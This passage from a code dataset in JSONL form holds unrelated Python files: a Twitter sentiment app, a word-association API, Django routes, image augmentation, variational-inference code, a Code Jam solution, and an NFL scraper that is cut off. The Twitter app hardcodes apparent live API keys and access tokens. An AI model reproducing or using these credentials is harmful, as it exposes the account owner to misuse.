all_data = json.loads(data)\n tweet = all_data[\"text\"]\n sentiment = sentiment_textblob(tweet)\n print(tweet, sentiment)\n output = open(\"twitter-out3.txt\",\"a\")\n output.write(sentiment)\n output.write(\"\\n\")\n self.counter += 1\n\n if self.counter == self.num_tweets_to_grab:\n return False\n\n return True\n\n def on_error(self, status):\n print(status)\n\n auth = OAuthHandler(ckey, csecret)\n auth.set_access_token(atoken, asecret)\n #progress = stqdm(range(int(number_of_tweets)))\n \n twitterStream = Stream(auth, listener(number_of_tweets))\n twitterStream.filter(track=[word])\n \n \n \n\n\n\n\ndef analyse():\n user = st.text_input(\"Eneter the username of the twitter user :\")\n #tweets = 
st.number_input(\"Enter the number of tweets you want to analyse:\")\n tweets = st.slider(\"Enter the number of tweets you want to analyse:\",10,200,10)\n \n button = st.button(\"Analyse\")\n if button:\n user_data(user, tweets)\n\ndef analyse_naive():\n user = st.text_input(\"Eneter the username of the twitter user :\")\n tweets = st.slider(\"Enter the number of tweets you want to analyse:\",10,200,10)\n button = st.button(\"Analyse\")\n if button:\n user_data_naive(user, tweets)\n\n \ndef ps():\n st.subheader(\"Live sentiment analyzer\")\n word = st.text_input(\"Enter the word for which you want to get the public sentiment\")\n twts = st.slider(\"Enter the number of tweets you want to fetch\",10,10000,10)\n button = st.button(\"Fetch\")\n if button:\n live_stream(word, twts)\n style.use(\"ggplot\")\n\n fig = plt.figure()\n ax1 = fig.add_subplot(1,1,1)\n \n pullData = open(\"twitter-out3.txt\",\"r\").read()\n lines = pullData.split('\\n')\n \n xar = []\n yar = []\n \n x = 0\n y = 0\n \n for l in lines:\n x += 1\n if \"pos\" in l:\n y += 1\n elif \"neg\" in l:\n y -= 1\n elif \"neutral\" in l:\n pass\n \n xar.append(x)\n yar.append(y)\n \n ax1.clear()\n ax1.plot(xar,yar)\n #ani = animation.FuncAnimation(fig, animate, interval=1)\n plt.show()\n st.pyplot()\n os.remove(\"twitter-out3.txt\")\n \n \n\n\ndef main():\n consumer_key = 'j5z6oTkkODllydAv4TJa8FxJS'\n consumer_secret = 'rSig6RvaLe2v8GzrsNsFpirLF2OKVxKune1NqXMuY8JV42RmKv'\n access_token = '1010014270845698050-rNQS8lrmTbzgMWpNI1khQA3xUSNMEK'\n access_token_secret = 'n4Jql8f1ao1McHKg5FQHQxTq1vV9ykcPI9hXBIp0CQKFn'\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth)\n st.set_option('deprecation.showPyplotGlobalUse', False)\n st.title(\" Twitter Analyzer \")\n st.sidebar.title(\" Choose Option : \")\n classifier = st.sidebar.selectbox(\"\", (\"Profile Analysis\",\"Profile Analysis (N.B)\", \"Live Sentiment Tracker\" ))\n #if st.sidebar.checkbox(\"Analyse a twitter account : \", key = \"a\"):\n if classifier == \"Profile Analysis\":\n analyse()\n elif classifier == \"Profile Analysis (N.B)\":\n analyse_naive()\n elif classifier == \"Live Sentiment Tracker\":\n ps()\n \n \n \n \nif __name__ == '__main__':\n main()\n \n ","repo_name":"kafka-654/twitter_analyzer","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":13667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29889861334","text":"\"\"\"API for getting political word associations\"\"\"\nimport hug\nimport gensim\n\nmodel_dir = \"/opt/sv_polit_word/models/\"\nvalid_parties =[ \"KD\", \"L\", \"M\", \"MP\", \"S\", \"SD\", \"V\", \"FP\", \"C\" ]\n\n#@hug.local()\n@hug.get('/sv_polit_word', output=hug.output_format.json, examples=\"party=S&word=sverige\")\ndef sv_polit_word(party:hug.types.one_of(valid_parties), word:hug.types.text):\n \"\"\" Political word associations by party\"\"\"\n mdl = gensim.models.Word2Vec.load(model_dir + party + \".model\")\n initial_word_list = \"\"\n try:\n initial_word_list = mdl.most_similar(word, topn=25)\n except:\n return {'errors': (\"'\" + word + \"': not enough data for model \" + party + \"\")}\n result_words = []\n for result in initial_word_list:\n # eg: [ {'text': 'landet', 'size': 57 } , {'text':'framtiden', 'size': 30} ]\n result_words.append( {'text': result[0], 'size': round(result[1] * 100) } )\n return { 'result': result_words 
}\n\n","repo_name":"nimishgautam/politician-words-sv","sub_path":"backend/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72924457794","text":"#!/usr/bin/env python\n# coding: utf-8\nfrom django.conf.urls import url\nfrom company import views\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^faq$', views.faq),\n url(r'^faq/(?P\\d{1,15})$', views.faq_cat_detail),\n url(r'^about$', views.about),\n url(r'^about/(?P\\d{1,15})$', views.about_cat_detail),\n url(r'^service$', views.service),\n url(r'^service/(?P\\d{1,15})$', views.service_cat_detail),\n url(r'^product$', views.products),\n url(r'^product/(?P\\d{1,15})$', views.product_cat_detail),\n url(r'^download$', views.download),\n url(r'^download/(?P\\d{1,15})$', views.download_cat_detail),\n url(r'^news/$', views.news),\n url(r'^news/(?P\\d{1,15})$', views.news_detail),\n \n]\n","repo_name":"guishende/gitPublic","sub_path":"web/webshare/company/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1245592704","text":"n1=input('请输入中文名字:')\r\nn2=input('请输入英文名字:')\r\nn3=input('请输入英文成绩:')\r\nn4=input('请输入数学成绩:')\r\nn5=int(n3)+int(n4)\r\nprint('{0}({1:<})欢迎使用本系统'.format(n1,n2))\r\nprint('{0}({1:<})你的总分是{2}'.format(n1,n2,n5))\r\nx=open('out1.txt',mode='w')\r\nprint('{0}({1:<})欢迎使用本系统'.format(n1,n2),file=x)\r\nprint('{0}({1:<})你的总分是{2}'.format(n1,n2,n5),file=x)\r\nx.close()","repo_name":"yvvvvvvvv/Scu_","sub_path":"Scu_Level1-1/Programming/20211118/10173116-2.py","file_name":"10173116-2.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40283087904","text":"import pinecone\nfrom dotenv import load_dotenv, find_dotenv\nimport os\n#\n# pinecone.init(api_key=\"YOUR_API_KEY\",\n# environment=\"us-east1-gcp\")\n\nload_dotenv(find_dotenv())\n\nclass JobStore:\n\n\n def __init__(self, environment, index_name, namespace):\n pinecone.init(api_key=os.environ.get(\"PINECONE_KEY\"), environment=environment)\n self.index = pinecone.Index(index_name)\n self.namespace = namespace\n self.jobs = []\n\n def get_k_nearest_jobs(self, embedding, k):\n query_response = self.index.query(\n namespace=self.namespace,\n top_k=k,\n include_values=True,\n include_metadata=True,\n vector=embedding\n )\n return query_response","repo_name":"renrut/jobs-app-backend","sub_path":"data/JobStore.py","file_name":"JobStore.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15352773026","text":"# Alternate letters in uppercase\n# A str‌ing (only alphabets) is passed as input. 
The printed output should contain alphabets in odd positions in each word in uppercase and alphabets in even positions in a word in lowercase.\n\n# Example input and output:\n\n# If the input is 'tREE GiVES us fruiTS', the output should be 'TrEe GiVeS Us FrUiTs'\n# If the input is 'FLoweR iS beauTIFUL', the output should be 'FlOwEr Is BeAuTiFuL'\n\n\n\n\n\n\nx = list(input().split())\nfor s in x:\n    s = list(s)\n    for i in range(len(s)):\n        if i%2: s[i]=s[i].lower()\n        else: s[i]=s[i].upper()\n    print(''.join(s),end=' ')","repo_name":"Logesh08/Programming-Daily-Challenges","sub_path":"Alternate letters in uppercase.py","file_name":"Alternate letters in uppercase.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22770302830","text":"import cv2\nimport mxnet as mx\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\n\n\ndef crop_augmentation(joint, crop_width, crop_height):\n    # Random crop\n    # Watch out: width before height in size param!\n    aug = mx.image.RandomCropAug(size=(crop_width, crop_height))\n    aug_joint = aug(joint)\n    # Deterministic resize\n    ratio = 0.7\n    resize_size = int(min(crop_width, crop_height)*ratio)\n    aug = mx.image.ResizeAug(resize_size)\n    aug_joint = aug(aug_joint)\n    # Add more translation/scale/rotation augmentations here\n    return aug_joint\n\n\ndef color_augmentation_bright(base):\n    # Only applied to the base image, and not the mask layers.\n    aug = mx.image.BrightnessJitterAug(brightness=0.5)\n    aug_base = aug(base)\n    # Add more color augmentations here...\n    return aug_base\n\n\ndef color_augmentation_contrast(base):\n    aug = mx.image.ContrastJitterAug(contrast=0.5)\n    aug_base = aug(base)\n    return aug_base\n\n\ndef horizontal_flip(base):\n    aug = mx.image.HorizontalFlipAug(p=1)\n    aug_base = aug(base)\n    return aug_base\n\n\ndef vertical_flip(base):\n    aug = mx.image.HorizontalFlipAug(p=1)\n    aug_base = aug(base.swapaxes(0, 1)).swapaxes(0, 1)\n    return aug_base\n\n\ndef joint_transform(image, mask):\n    aug_base_list, aug_mask_list = [], []\n    # Convert types\n    image = image.astype('float32')/255\n    mask = mask.astype('float32')/255\n\n    mx_image = mx.nd.array(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n    mx_mask = mx.nd.array(mask)\n    # Join\n    # Concatenate on channels dim, to obtain a 6 channel image\n    # (3 channels for the base image, plus 3 channels for the mask)\n    base_channels = mx_image.shape[2] # so we know where to split later on\n    joint = mx.nd.concat(mx_image, mx_mask, dim=2)\n\n    # Augmentation Part 1: positional\n    (h, w) = image.shape[:2]\n    aug_joint = crop_augmentation(joint, int(w*0.5), int(h*0.5))\n    # Split\n    aug_base = aug_joint[:, :, :base_channels]\n    aug_mask = aug_joint[:, :, base_channels:]\n    aug_base_list.append(aug_base)\n    aug_mask_list.append(aug_mask)\n\n    # Augmentation Part 1-1: positional again\n    aug_joint = crop_augmentation(joint, int(w*0.75), int(h*0.75))\n    # Split\n    aug_base = aug_joint[:, :, :base_channels]\n    aug_mask = aug_joint[:, :, base_channels:]\n    aug_base_list.append(aug_base)\n    aug_mask_list.append(aug_mask)\n\n    # Augmentation 2: color brightness\n    aug_base = color_augmentation_bright(mx_image.copy())\n    aug_base_list.append(aug_base)\n    aug_mask_list.append(mx_mask)\n\n    # Augmentation 3: color contrast\n    aug_base = color_augmentation_contrast(mx_image.copy())\n    aug_base_list.append(aug_base)\n    aug_mask_list.append(mx_mask)\n\n    # Augmentation 4: horizontal flip\n    aug_joint = horizontal_flip(joint)\n    aug_base = aug_joint[:, 
:, :base_channels]\n aug_mask = aug_joint[:, :, base_channels:]\n aug_base_list.append(aug_base)\n aug_mask_list.append(aug_mask)\n\n # # Augmentation 5: vertical flip\n aug_joint = vertical_flip(joint)\n aug_base = aug_joint[:, :, :base_channels]\n aug_mask = aug_joint[:, :, base_channels:]\n aug_base_list.append(aug_base)\n aug_mask_list.append(aug_mask)\n\n # # Augmentation 6: rotate\n (h, w) = image.shape[:2]\n M = cv2.getRotationMatrix2D((w/2, h/2), 30, 1.0)\n aug_base = cv2.warpAffine(image, M, (w, h))\n aug_mask = cv2.warpAffine(mask, M, (w, h))\n aug_base = mx.nd.array(cv2.cvtColor(aug_base, cv2.COLOR_BGR2RGB))\n aug_mask = mx.nd.array(aug_mask)\n aug_base_list.append(aug_base)\n aug_mask_list.append(aug_mask)\n M = cv2.getRotationMatrix2D((w/2, h/2), 120, 1.0)\n aug_base = cv2.warpAffine(image, M, (w, h))\n aug_mask = cv2.warpAffine(mask, M, (w, h))\n aug_base = mx.nd.array(cv2.cvtColor(aug_base, cv2.COLOR_BGR2RGB))\n aug_mask = mx.nd.array(aug_mask)\n aug_base_list.append(aug_base)\n aug_mask_list.append(aug_mask)\n\n return aug_base_list, aug_mask_list\n\n\ndef plot_mx_arrays(arrays):\n \"\"\"\n Array expected to be height x width x 3 (channels), and values are floats between 0 and 255.\n \"\"\"\n plt.subplots(figsize=(12, 4))\n row_num = len(arrays)\n col_num = len(arrays[0])\n print('Row=', row_num, ' Col=', col_num)\n for ri, sub_arrays in enumerate(arrays):\n for idx, array in enumerate(sub_arrays):\n assert array.shape[2] == 3, \"RGB Channel should be last\"\n plt.subplot(row_num, col_num, idx+1+col_num*ri)\n # make sure array type equals to mxnet ndarray\n plt.imshow((array.clip(0, 255)/255).asnumpy())\n plt.savefig('augment.png')\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Data augmentation')\n parser.add_argument('--imgdir', dest='data_dir', type=str, default=None, required=True,\n help='Root directory of data. Note that there must be subfolder image/ and mask/ under the directory.')\n parser.add_argument('--log', action='store_true', default=False,\n help='Decide to or not to print logging information. 
(default: fasle)')\n args = parser.parse_args()\n\n image_dir = args.data_dir + \"image/\"\n mask_dir = args.data_dir + \"mask/\"\n img_paths = sorted(\n [image_dir + img_name for img_name in os.listdir(image_dir)])\n mask_paths = sorted(\n [mask_dir + mask_name for mask_name in os.listdir(mask_dir)])\n\n count = 1\n save_dir = args.data_dir[:-1] + '_Augmented/'\n if not os.path.exists(save_dir):\n os.mkdir(save_dir)\n os.mkdir(save_dir+'image/')\n os.mkdir(save_dir+'mask/')\n for img_path, mask_path in zip(img_paths, mask_paths):\n if(args.log):\n print(img_path, mask_path)\n image = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n trans_imgs, trans_masks = joint_transform(image, mask)\n mx_image = mx.nd.array(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n mx_mask = mx.nd.array(mask)\n output_images = [mx_image.astype('float32')]\n output_images += [img*255 for img in trans_imgs]\n output_masks = [mx_mask.astype('float32')]\n output_masks += [msk*255 for msk in trans_masks]\n # plot_mx_arrays([output_images, output_masks])\n # break\n for image, mask in zip(output_images, output_masks):\n # image = cv2.cvtColor(np.float32(image), cv2.COLOR_RGB2BGR)\n cv2.imwrite('%simage/%04d.png' %\n (save_dir, count), cv2.cvtColor(image.asnumpy(), cv2.COLOR_RGB2BGR))\n # mask = cv2.cvtColor(mask.astype('uint8'), cv2.COLOR_RGB2BGR)\n cv2.imwrite('%smask/%04d.png' %\n (save_dir, count), mask.asnumpy())\n count += 1\n","repo_name":"huhuman/crack-segmentation","sub_path":"utils/data_augmentation.py","file_name":"data_augmentation.py","file_ext":"py","file_size_in_byte":6699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15888795939","text":"from tensorflow.keras.applications.resnet50 import ResNet50\nimport os\n\n\ndef get_model():\n return ResNet50(weights='imagenet')\n\n\ndef main():\n model = get_model()\n save_path = os.path.join(os.path.dirname(__file__), 'model', 'resnet50.h5')\n dir_name = os.path.dirname(save_path)\n os.makedirs(dir_name, exist_ok=True)\n model.save(save_path)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Adlik/Adlik","sub_path":"benchmark/tests/test_model/resnet50_keras/resnet50_keras.py","file_name":"resnet50_keras.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":702,"dataset":"github-code","pt":"61"} +{"seq_id":"72329611715","text":"import numpy as np\nimport tensorflow_probability as tfp\nfrom tensorflow_probability import bijectors as tfb\nimport tensorflow as tf\nfrom tensorflow_probability.python.vi import csiszar_divergence\ntfd = tfp.distributions\nfrom functools import partial\nimport matplotlib.pyplot as plt\nfrom tensorflow_probability.python.internal import nest_util\n\nfrom qvi.core.distribution import get_gaussian_quantization_weights\nfrom qvi.misc.utils import split_to_nested_tensors\n\n\nDTYPE = tf.float32\n_reparameterized_elbo = partial(\n csiszar_divergence.monte_carlo_variational_loss,\n discrepancy_fn=csiszar_divergence.kl_reverse,\n use_reparameterization=True)\n\nimport tensorflow_probability as tfp\nimport tensorflow as tf\nfrom tensorflow_probability.python.vi import csiszar_divergence\ntfd = tfp.distributions\nfrom functools import partial\n_reparameterized_elbo = partial(\n csiszar_divergence.monte_carlo_variational_loss,\n discrepancy_fn=csiszar_divergence.kl_reverse,\n use_reparameterization=True)\n\nclass VariationalInference:\n def __init__(self,\n target_log_prob_fn,\n surrogate_posterior, \n sample_size,\n 
variational_loss_fn,\n optimizer,\n num_steps,\n trace_fn=None,\n name=''):\n self.target_log_prob_fn=target_log_prob_fn\n self.surrogate_posterior=surrogate_posterior\n self.trace_fn=trace_fn\n self.optimizer=optimizer\n self.num_steps=num_steps\n self.variational_loss_fn=variational_loss_fn\n self.trainable_variables=surrogate_posterior.trainable_variables\n self.sample_size=sample_size\n self.name = name\n \n def run(self):\n #pbar = tqdm(total=num_steps)\n self.trace = tfp.vi.fit_surrogate_posterior(\n target_log_prob_fn=self.target_log_prob_fn,\n surrogate_posterior=self.surrogate_posterior,\n trace_fn=self.trace_fn,\n optimizer=self.optimizer,\n num_steps=self.num_steps,\n variational_loss_fn=self.variational_loss_fn,\n trainable_variables=self.trainable_variables,\n sample_size=self.sample_size)\n \n def plot(self, abscissa='time',name=''):\n loss, timestamps, grads = self.trace\n if abscissa == 'time':\n x = timestamps - timestamps[0]\n elif abscissa == 'epochs':\n x = np.arange(0,len(loss))\n plt.plot(x, -loss, label=name)\n \n\nclass MCVariationalInference(VariationalInference):\n def __init__(self,\n target_log_prob_fn,\n surrogate_posterior, \n sample_size,\n optimizer,\n trace_fn,\n num_steps,\n name=''):\n super().__init__(target_log_prob_fn=target_log_prob_fn,\n surrogate_posterior=surrogate_posterior, \n sample_size=sample_size,\n variational_loss_fn=vi_mc,\n optimizer=optimizer,\n num_steps=num_steps,\n trace_fn=trace_fn,\n name='')\n\nclass RQMCVariationalInference(VariationalInference):\n def __init__(self,\n target_log_prob_fn,\n surrogate_posterior, \n sample_size,\n optimizer,\n trace_fn,\n num_steps,\n name=''):\n super().__init__(target_log_prob_fn=target_log_prob_fn,\n surrogate_posterior=surrogate_posterior, \n sample_size=sample_size,\n variational_loss_fn=vi_mc,\n optimizer=optimizer,\n num_steps=num_steps,\n trace_fn=trace_fn,\n name='')\n\n \nclass QuantizedVariationalInference(VariationalInference):\n def __init__(self,\n target_log_prob_fn,\n surrogate_posterior, \n sample_size,\n optimizer,\n trace_fn,\n num_steps,\n D,\n name=''):\n \n self.D = D\n \n super().__init__(target_log_prob_fn=target_log_prob_fn,\n surrogate_posterior=surrogate_posterior, \n sample_size=sample_size,\n variational_loss_fn=partial(vi_quantized, seed=None, K='', D=self.D),\n optimizer=optimizer,\n num_steps=num_steps,\n trace_fn=trace_fn,\n name='')\n \nclass QuantizedRichardsonVariationalInference(VariationalInference):\n def __init__(self,\n target_log_prob_fn,\n surrogate_posterior, \n sample_size,\n optimizer,\n num_steps,\n trace_fn,\n D,\n M,\n name=''):\n \n self.D = D\n self.M = M\n \n super().__init__(target_log_prob_fn=target_log_prob_fn,\n surrogate_posterior=surrogate_posterior, \n sample_size=sample_size,\n variational_loss_fn=partial(vi_quantized_richardson, seed=None, D=self.D, M=self.M),\n optimizer=optimizer,\n num_steps=num_steps,\n trace_fn=trace_fn,\n name='')\n \ndef vi_quantized_richardson(target_log_prob_fn,\n surrogate_posterior,\n sample_size,\n seed,\n D,\n M):\n \n #N value is sample_size\n N = sample_size\n \n def q_divergence(sample_size):\n q_samples = surrogate_posterior.sample(sample_size)\n surrogate_posterior_log_prob = surrogate_posterior.log_prob(q_samples)\n target_log_prob = nest_util.call_fn(partial(target_log_prob_fn), q_samples)\n weights = get_gaussian_quantization_weights(shape= (sample_size,D), dtype=tf.float32)\n divergence = tfp.vi.kl_reverse(target_log_prob - surrogate_posterior_log_prob)\n return tf.tensordot(weights,divergence, 
axes=1)\n \n divN = tf.reduce_sum(q_divergence(N))\n divM = tf.reduce_sum(q_divergence(M))\n power = tf.constant(2.)\n coeff_pow = D\n\n reg_M = tf.math.pow(tf.cast(M,dtype=DTYPE),power/coeff_pow)\n reg_N = tf.math.pow(tf.cast(N,dtype=DTYPE),power/coeff_pow)\n elbo = ( reg_N * divN - reg_M * divM)/(reg_N - reg_M)\n return elbo\n\n\ndef vi_quantized(target_log_prob_fn,\n surrogate_posterior,\n sample_size,\n seed,\n D,\n K):\n q_samples = surrogate_posterior.sample(sample_size)\n \n surrogate_posterior_log_prob = surrogate_posterior.log_prob(q_samples)\n target_log_prob = nest_util.call_fn(partial(target_log_prob_fn), q_samples)\n weights = get_gaussian_quantization_weights(shape= (sample_size,D), dtype=tf.float32)\n divergence = tfp.vi.kl_reverse(target_log_prob - surrogate_posterior_log_prob)\n elbo = tf.reduce_sum(tf.tensordot(weights,divergence, axes=1))\n\n #tf.print(elbo)\n return elbo\n\ndef vi_mc(target_log_prob_fn,\n surrogate_posterior,\n sample_size,\n seed=None):\n q_samples = surrogate_posterior.sample(sample_size)\n \n surrogate_posterior_log_prob = surrogate_posterior.log_prob(q_samples)\n target_log_prob = nest_util.call_fn(partial(target_log_prob_fn), q_samples)\n\n divergence = tfp.vi.kl_reverse(target_log_prob - surrogate_posterior_log_prob)\n elbo = tf.reduce_mean(divergence, axis=0)\n return elbo\n\n# def trace_bnn(loss, grads, variables):\n# pbar.set_description('ELBO: %s' % str(loss.numpy()))\n# pbar.update()\n# return loss, tf.timestamp(), grads\n\ndef build_meanfield_advi(jd_list, observed_node=-1, distribution=tfd.Normal, reinterpreted_batch_ndims_node = 1, **kwargs):\n \"\"\"\n The inputted jointdistribution needs to be a batch version\n \"\"\"\n list_of_values = jd_list.sample(1) \n list_of_values.pop(observed_node) \n distlist = []\n for i, value in enumerate(list_of_values):\n dtype = value.dtype\n rv_shape = value[0].shape\n #print(rv_shape)\n loc = tf.Variable(tf.zeros(rv_shape), \n name='meanfield_%s_mu' % i,\n dtype=dtype)\n scale = tfp.util.TransformedVariable(tf.ones(rv_shape), tfb.Softplus(),\n name='meanfield_%s_scale' % i)\n \n approx_node = distribution(loc=loc,\n scale=scale,\n name='meanfield_%s' % i, **kwargs)\n \n if loc.shape == ():\n distlist.append(approx_node)\n else:\n distlist.append(\n tfd.Independent(approx_node, reinterpreted_batch_ndims=reinterpreted_batch_ndims_node)\n )\n\n meanfield_advi = tfd.JointDistributionSequential(distlist)\n return meanfield_advi\n\ndef trainable_normal_distribution(shape, name='', distribution=tfd.Normal, **kwargs):\n loc = tf.Variable(tf.zeros(shape), name='{}_loc'.format(name))\n scale = tfp.util.TransformedVariable(tf.Variable(tf.fill(shape,1.), name='{}_scale'.format(name)),\n bijector = tfb.Softplus())\n return distribution(loc, scale, name=name, **kwargs)\n","repo_name":"amirdib/quantized-variational-inference","sub_path":"qvi/core/vi.py","file_name":"vi.py","file_ext":"py","file_size_in_byte":9200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4051846312","text":"import OpticalInstruments as opi\nfrom PIL import Image\n\nprimary_mirror = opi.SphericalMirrror(-178)\nsecondary_mirror = opi.SphericalMirrror(57.15)\neyepiece = opi.ThinLens(40)#40\neye = opi.ThinLens(18.78, 1.337)\nthick_eyepiece = opi.ThickLens(1.5, 26, 80, 10)\ndeg_mirror = opi.PlaneMirror(45)\n\nsystem = [primary_mirror, secondary_mirror, deg_mirror, eyepiece]\n\nsystem_2 = [primary_mirror, secondary_mirror, deg_mirror, thick_eyepiece, eye]\ndist = [-59.7745, 2990, 960] 
#960\n\ncassegrain_telescope = opi.OpticalSystem(system, dist)\n\nobj_path = 'images/moon.png' #Path of the object\nresolution = 49.66 * 1e+6 #Pixel size in mm\nso = 384400 * 1e+6 #Distance to object\nsi = 18.78 * 1e-6 #Distance to image\nmax_angle = 0.04548328 # Max acceptation angle in radians\n\natten = 14\n#data = cassegrain_telescope.observe(obj_path, so, si, eye, resolution, atten)\n\n#Aberrated DATA\naberrated_data = cassegrain_telescope.observe(obj_path, so, si, eye, resolution, atten, max_angle)\n\n\n\n#We interpolate and visualize results\n#cassegrain_telescope.visualize_results('ouput/moon_out.png')\n\n#image.save('output/moon_out.png', format='PNG')\n\n\n\n\n\n\n\nprint(cassegrain_telescope.ABCD_matrix)\n","repo_name":"JuanHaunted/OpticalSystems","sub_path":"optpy/cassegrain_simplified.py","file_name":"cassegrain_simplified.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23388852251","text":"#!/usr/bin/env python3\r\nfrom itertools import chain\r\nimport sys\r\n\r\nPROBLEM_LETTER = 'B'\r\nDIFFICULTY = sys.argv[1]\r\nINPUT_FILE = '{0}-{1}.in'.format(PROBLEM_LETTER, DIFFICULTY)\r\nOUTPUT_FILE = '{0}-{1}.out'.format(PROBLEM_LETTER, DIFFICULTY)\r\n\r\n\r\ndef equalSet(l):\r\n return len(set(l)) == 1\r\n\r\ndef allEqual(field):\r\n return len(set(chain(*field))) == 1\r\n\r\ndef solve(fin):\r\n rows, cols = tuple(int(s) for s in fin.readline().split())\r\n field = list(range(rows))\r\n for r in range(rows): field[r] = list(int(s) for s in fin.readline().split())\r\n\r\n wasRow, wasCol = [False] * rows, [False] * cols\r\n while True:\r\n if allEqual(field):\r\n return 'YES'\r\n foundEqual, rowNumber, colNumber = False, None, None\r\n for r in range(rows):\r\n if wasRow[r]: continue\r\n if equalSet(field[r]):\r\n foundEqual, rowNumber = True, r\r\n break\r\n if not foundEqual:\r\n for c in range(cols):\r\n if wasCol[c]: continue\r\n if equalSet([field[j][c] for j in range(rows)]):\r\n foundEqual, colNumber = True, c\r\n break\r\n if not foundEqual: break\r\n if rowNumber is not None:\r\n wasRow[rowNumber] = True\r\n for c in range(cols):\r\n maxElem = max(field[j][c] for j in range(rows))\r\n field[rowNumber][c] = maxElem\r\n else:\r\n wasCol[colNumber] = True\r\n for r in range(rows):\r\n maxElem = max(field[r])\r\n field[r][colNumber] = maxElem\r\n return 'NO'\r\n\r\nif __name__ == \"__main__\":\r\n fin = open(INPUT_FILE, 'r')\r\n fout = open(OUTPUT_FILE, 'w')\r\n\r\n testCount = int(fin.readline())\r\n for i in range(testCount):\r\n answer = solve(fin)\r\n fout.write('Case #{0}: {1}\\n'.format(i + 1, answer))\r\n\r\n fin.close()\r\n fout.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_117/476.py","file_name":"476.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73893282755","text":"\"\"\"\n18. 
Write a Python program to find palindromes in a given list of strings using Lambda.\nOrginal list of strings:\n['php', 'w3r', 'Python', 'abcd', 'Java', 'aaa']\nList of palindromes:\n['php', 'aaa']\n\"\"\"\nORIG_LIST = ['php', 'w3r', 'Python', 'abcd', 'Java', 'aaa']\n\n\nif __name__ == '__main__':\n print(list(filter(lambda s: s == s[::-1], ORIG_LIST)))\n","repo_name":"aoki-h-jp/playground","sub_path":"python-w3resource-exercises/python-lambda/018.py","file_name":"018.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23187500308","text":"import os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\",\"gamesProj.settings\")\n\nimport django\ndjango.setup()\nfrom fb_app.models import Games, Week, Teams, Season\nfrom django.db.models import Count\nimport urllib3\nfrom bs4 import BeautifulSoup\nimport urllib.request\nfrom datetime import datetime, timezone\nfrom selenium.webdriver import Chrome, ChromeOptions\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pytz\n\n\n\ndef load_sched(year):\n\n #changing weeks to load preseason weeks (make week 0 and cnt 1)\n if Week.objects.filter(current=True).exists():\n current_week = Week.objects.get(current=True)\n week_cnt = current_week.week + 1\n else:\n week_cnt = 1\n \n #week_cnt = current_week.week + 1\n season = Season.objects.get(current=True)\n while week_cnt < 5:\n try:\n week, created = Week.objects.get_or_create(season_model=season, week=week_cnt)\n #week.season = season.season\n if not week.current:\n week.current = False\n #week.current = True\n week.season = season.season\n #week.week = week_cnt\n week.game_cnt = 0\n week.save()\n\n if week_cnt > 17:\n url_week = 'post' + str(week_cnt - 17)\n else:\n url_week = 'reg' + str(week_cnt)\n\n\n #url = \"https://www.nfl.com/schedules/2020/\" + str(week_cnt) + \"/\"\n url = \"https://www.nfl.com/schedules/\" + str(season.season) + \"/\" + url_week + \"/\"\n print (url)\n\n game_dict = {}\n options = ChromeOptions()\n options.add_argument(\"--headless\")\n options.add_argument(\"--disable-gpu\")\n\n\n driver = Chrome(options=options)\n \n driver.get(url)\n #sleep.sleep(10)\n #g = driver.find_elements_by_class_name(\"nfl-c-matchup-strip__left-area\")\n main = driver.find_element_by_id(\"main-content\")\n for section in main.find_elements_by_class_name('nfl-o-matchup-group'):\n date_t = section.find_element_by_class_name('d3-o-section-title').text.split(',')[1].lstrip()\n month = date_t.split(' ')[0]\n day = date_t.split(' ')[1].strip('TH').strip('ND').strip('ST').strip('RD')\n game_dow = section.find_element_by_class_name('d3-o-section-title').text.split(',')[0]\n #fix the year for Jan games\n print ('month', month, len(month))\n if month in ['JANUARY', 'FEBRUARY']:\n year = int(season.season) + 1\n else:\n year = season.season\n web_game_date = (str(month) + ' ' + str(day) + ', ' + str(year))\n\n for game_info in section.find_elements_by_class_name('nfl-c-matchup-strip__left-area'):\n teams = game_info.find_elements_by_class_name('nfl-c-matchup-strip__team-fullname')\n \n away = Teams.objects.get(long_name=(teams[0].get_attribute('innerHTML').lstrip().rstrip()))\n home = 